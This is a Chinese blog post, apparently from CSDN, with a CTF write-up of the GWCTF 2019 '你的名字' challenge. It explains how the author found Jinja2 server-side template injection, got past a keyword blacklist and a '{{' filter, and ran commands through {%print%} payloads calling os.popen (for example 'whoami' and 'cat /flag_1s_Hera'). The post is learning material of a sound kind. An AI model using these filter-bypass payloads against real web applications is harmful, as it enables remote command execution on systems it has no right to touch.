[GWCTF 2019]你的名字

最新推荐文章于 2023-11-06 20:18:02 发布
最新推荐文章于 2023-11-06 20:18:02 发布
阅读量1.6k 收藏 8
点赞数 4
分类专栏: web学习 ssti flask 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/119813547
版权
web学习 同时被 3 个专栏收录
39 篇文章 1 订阅
订阅专栏
flask
8 篇文章 0 订阅
订阅专栏
ssti
3 篇文章 0 订阅
订阅专栏

[GWCTF 2019]你的名字

在这里插入图片描述
打开题目后界面如上所示,你输入什么名字后就会显示出来
在这里插入图片描述
说实话,这种题不出意外应该就是模板注入没跑了

试了下{{2+2}}直接报错,还是报的php的错,但是{2+2}就可以正常显示出来,这就说明{{可能被过滤了,而{可能没被过滤,所以我们再试一些只要{}就能用的句子试试,如{% set a=“test” %}
在这里插入图片描述
执行完了以后虽然没有回显但也没有报错,说明正常执行了这句话,确定了考点是模板注入后就得想想怎么绕过了

上网找了一篇模板注入绕过相关文章

在这里插入图片描述
这里用了if语句执行命令,但是这有一个疑问,我怎么知道各个模块在环境中的具体位置啊,如他这里的’’.class.mro[2].subclasses()[59]在我们题目环境中执行了这个语句得到的可能和他写这个payload时用的不是同一个子类啊。这里实在想不通了,找了WP来看,结果大多数都是直接用别人的payload,都没有说是怎么构造出来的。找了好久终于找到一篇WP讲解了payload的构造过程

它用了{%print %}这种形式,这样就能打印出执行信息了

试了下{%print lipsum %},终于有回显了,有回显了就好开始下面的构造了,至于一步步构造payload的过程有疑惑的,可以看一看我之前写的ssti相关文章
在这里插入图片描述
这里还得补充一点,{%print %}形式下,若果你构造的payload是正常的ssti用到的语句却没有回显,就说明你的语句中可能有关键字被过滤了,如{%print ‘’.class %}执行之后没有任何的回显,但{%print ‘’.clconfigass %}成功执行有回显,这说明class被过滤了
在这里插入图片描述
这里直接给出本体的黑名单源代码
在这里插入图片描述
这过滤代码挺傻的,是先从黑名单中取出一个字符串经过循环过滤再进行下一个字符串的过滤,因为config字符串是在黑名单的最后一个,所以黑名单中前面字符串的过滤都已经结束了,再进行config的过滤,所以我们在过滤字符中加入config就可以绕过

所以最终的payload可以写成如下形式

{%print lipsum.__globals__.__builconfigtins__.__impoconfigrt__('oconfigs').poconfigpen('whoami').read()%}

在这里插入图片描述
也可以拼接绕过

{%print lipsum.__globals__['__bui'+'ltins__']['__im'+'port__']('o'+'s')['po'+'pen']('whoami').read()%}

在这里插入图片描述
**或者设置变量的方法
**

{%set a='__bui'+'ltins__'%}
{%set b='__im'+'port__'%}
{%set c='o'+'s'%}
{%set d='po'+'pen'%}
{%print(lipsum['__globals__'][a][b](c)[d]('cat /flag_1s_Hera')['read']())%}

在这里插入图片描述
当然,绕过方法还有很多,我的ssti文章中也详细讲了许多原理,有兴趣的可以看看.这道题最大的收获我觉得还是我看的这个大佬成功利用{%print %}解决了回显问题,而网上的其他大多数文章为了解决无法回显的问题大多是选择外带的形式,这就有一点麻烦了
在这里插入图片描述
参考文章:
https://johnfrod.top/uncategorized/gwctf-2019%E4%BD%A0%E7%9A%84%E5%90%8D%E5%AD%97/
https://blog.z3ratu1.cn/%5BGWCTF%202019%5D%E4%BD%A0%E7%9A%84%E5%90%8D%E5%AD%97.html
https://blog.csdn.net/cjdgg/article/details/115770395?spm=1001.2014.3001.5501
https://xz.aliyun.com/t/6885#toc-4

lmonstergg
关注
专栏目录
[GWCTF 2019]你的名字 - SSTI注入(waf绕过)
oZuoShen123的博客
10-10 321
分析 1、页面只有一个输入框,输入什么回显什么 2、根据特性应该是SSTI注入 解题 fuzz:过滤则长度1512 过滤:{{}}、class、mro、builtins、file、func_globals、import、args、eval、for、if、config、popen(将open过滤) 绕过:{{}}用{%print%}、关键字要么用attr(‘cla’'ss’)|attr(‘base’)形式绕过、要么用['__clas'+'s__']形式绕过、要么用clconfigass形式绕
babyvm wp
12-21
【babyvm wp】是关于虚拟机(VM)逆向工程的一个练习题目,源自广东外语外贸大学2019年的一场比赛。在这个问题中,我们需要理解一个简化版的虚拟机指令集,然后解决CTF(Capture The Flag)挑战。以下是这个虚拟机的...
BUUCTF:[GWCTF 2019]你的名字 --- ssti -- bypass 学习
Zero_Adam的博客
04-22 1646
一、自己做: 抓包没啥,除非要扫目录, 啊,,就是直接返回的逻辑,,xss也是直接返回,也就说明有某些机制了,然后想去闭合一些标签,但是都没成功,</div>,</h1>,这些, 感觉没思路了,,扫扫目录把。 别了,想到了ssti,试了一下:{{2*2}},报错了 Parse error: syntax error, unexpected T_STRING, expecting '{' in \var\WWW\html\test.php on line 13 而且,还不能处理中文
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3421
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
DES加密、DES解密、AES加密、AES解密
06-26
个人例子,VS2013,DES加密、DES解密,AES加密,AES解密,
el函数的使用文档
07-09
### EL函数的深入理解与应用 #### 一、EL(Expression Language)简介 EL,即表达式语言(Expression Language),是JavaServer Pages (JSP) 技术的一部分,用于简化在JSP页面中访问和操作JavaBean属性的过程。...
buu刷题(4)
qq_62046696的博客
03-22 558
题目中只限制了 F I L E S [ f i l e ] ∗ ∗ 的上传后缀,也只给出 ∗ ∗ _FILES[file]** 的上传后缀,也只给出 ** FILES[file]∗∗的上传后缀,也只给出∗∗_FILES[file] 上传后的路径,那我们上传多文件就可以绕过。人傻了,上面的思路全部错掉,上面输入的filename文件,其实是没有权限执行php代码的,这点我们可以通过phpinfo();所以我们的恶意代码先执行。也是通过报错推断出过滤了{{而没用过滤{,这里我用的是{%3*3%}发现回显的是,
服务端模板注入(SSTI)上
why811的博客
07-18 799
在handleCache内,首先判断有没有开启options.cache此值默认为空,所以没有进去if区间,然后在elseif处判断了hasTemplate的值是否为空,此值的定义是从arguments.length得到的,所以此值不为空,也没有进入到elseif区间内,然后就到了exports.compile处,这里在调用compile方法时把模板传入,继续跟踪此方法。内建函数很像子变量(也像Java中的方法),它们并不是数据模型中的东西,是Freemarker在数值上添加的。
服务器端模板注入(SSTI)
nextlubricate的博客
11-21 517
判断模板: X-Powered-By:ThinkPHP Python 【Mako、Tornado】 PHP 【Twig】 127.0.0.1/ssti={{4*4}} #如果算出16,可以推断出使用Mako、Tornado、Twig模板 PHP 【Smarty】 Java 【Freemarker】 127.0.0.1/ssti=${2*2} //如果算出4,可以推断出使用Smarty、Freemarker模板 Python 【Jinja】 127.0.0.1/ssti=${2*5} //如果算出55.
SSTI注入中判断服务器模板的方法(含例题)
最新发布
2301_76690905的博客
11-06 204
然后回到最初注入${7*7}成功回显出49的情况,这种时候是执行成功走绿线,再次注入a{*comment*}b,如果执行成功回显。如果没有回显出ab,就是执行失败走红线,注入${"z".join("ab")},如果执行成功回显出。如果注入{{7*7}}回显了49代表执行成功,继续往下走注入{{7*'7}'},如果执行成功回显。我们可以看到有红色剪头和绿色箭头,绿色是执行成功,红色是执行失败。首先是注入${7*7}没有回显出49的情况,这种时候就是。,再次注入{{7*7}}如果还是没有回显49就代表这里。
【WEB攻防】Flask(Jinja2) 服务端模板注入漏洞 原理+防御
AAAAAAAAAAAA66的博客
12-19 6867
前面写CTF题目的时候做过几道SSTI模板注入的题目。最近又遇到了一个不错的CTF网站, http://bmzclub.cn 里面不但有CTF题目,更重要的是有漏洞环境,不需要自己去一个一个去安装,对于我这样的懒人简直是福音。 目录 Flask模板注入简介 Flask和Jinja2介绍: 注入原理 复现 手动注入 工具探测 Flask模板注入简介 Flask和Jinja2介绍: 1.Flask是一个轻量级的基于Python的web框架。 2.Jinja 模板只是一个属于.
SSTI漏洞原理及渗透测试
二狗的博客
02-14 586
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
模板注入漏洞
y17861077326的博客
04-07 1284
SSTI(Server-Side TemplateInjection)服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的。此种类型漏洞虽然多次在CTF中,以Python语言为载体出现,但是这并不是Python模板引擎独有的漏洞。 值得注意的是: 凡是使用模板的地方都可能会出现SSTI的问题,SSTI不属于任何一种语言。 jinja2原理 以下内容,以Python的模板引擎Jinja2为例。 from flask import
CTFHub技能书解题笔记-XSS-反射型
qq_43006864的博客
12-24 1659
打开题目 来个最常规的试试。 好像没思路了。看到第二行是说发送url去bot,第一行是你的名字。那我试试第二行放url。 返回了successfully。 然后没思路了。去看了大佬的wp,好像用到了xss平台,注册一个试试。 XSS平台 - (支持http/https)XSS Platform 这里我用的这个。 开始测试。注册完成后,创建项目。 这里随便√,默认的就够用了。 这里我们选择红框里的这一条,进行测试。 就贴在?name=后面...
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3327
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
re学习笔记(39)BUUCTF-re-[GWCTF 2019]xxor
逆向随笔
02-20 1702
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 题目链接:[GWCTF 2019]xxor xorm[0] = 3746099070, xorm[1] = 550153460, xorm[2] = 3774025685, xorm[3] = 1548802262, xorm[4] = 2652626477, xorm[5] = 2230518816 ...
buu Crypto学习记录(7) password
EMsheep的博客
11-27 524
题目链接:https://buuoj.cn/challenges#password 姓名:张三 生日:19900315 key格式为key{xxxxxxxxxx} flag:zs19900315
[GWCTF2019]huyao
07-28
\[GWCTF2019\]huyao是一个CTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,它可能涉及到频域盲水印隐写。具体的解题方法和细节需要参赛者在比赛中进行分析和解决。 #### 引用[.reference_title] - *1* [BUUCTF MISC刷题笔记(三)](https://blog.csdn.net/weixin_45696568/article/details/116421340)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [BUUCTF misc 解题记录 二(超级详细)](https://blog.csdn.net/qq_51090016/article/details/115712647)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值